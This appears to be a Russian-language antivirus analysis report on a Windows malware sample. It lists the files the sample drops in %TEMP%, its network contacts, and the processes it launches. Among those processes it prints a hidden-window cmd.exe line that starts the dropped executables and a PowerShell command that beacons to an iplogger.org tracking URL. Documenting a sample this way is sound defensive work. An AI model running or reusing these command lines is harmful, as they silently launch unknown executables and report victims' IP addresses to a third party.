Техническая информация
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\3.exe
- %TEMP%\hello_c# (2).exe
- %TEMP%\hello_c#.exe
- %TEMP%\nsl165e.tmp\axbzrs6.dll
Удаляет следующие файлы
- %TEMP%\nsl165e.tmp\axbzrs6.dll
Сетевая активность
Подключается к
- 'te##te.in':443
- 'x1.#.lencr.org':80
TCP
Запросы HTTP GET
- http://x1.#.lencr.org/
Другие
- 'te##te.in':443
UDP
- DNS ASK te##te.in
- DNS ASK x1.#.lencr.org
Другое
Создает и запускает на исполнение
- '%TEMP%\3.exe'
- '%TEMP%\hello_c# (2).exe'
- '%TEMP%\hello_c#.exe'
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c start "" "3.exe" & start "" "hello_C# (2).exe" & start "" "hello_C#.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1qpJi7" (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command "Invoke-WebRequest -Uri https://iplogger.org/1qpJi7"
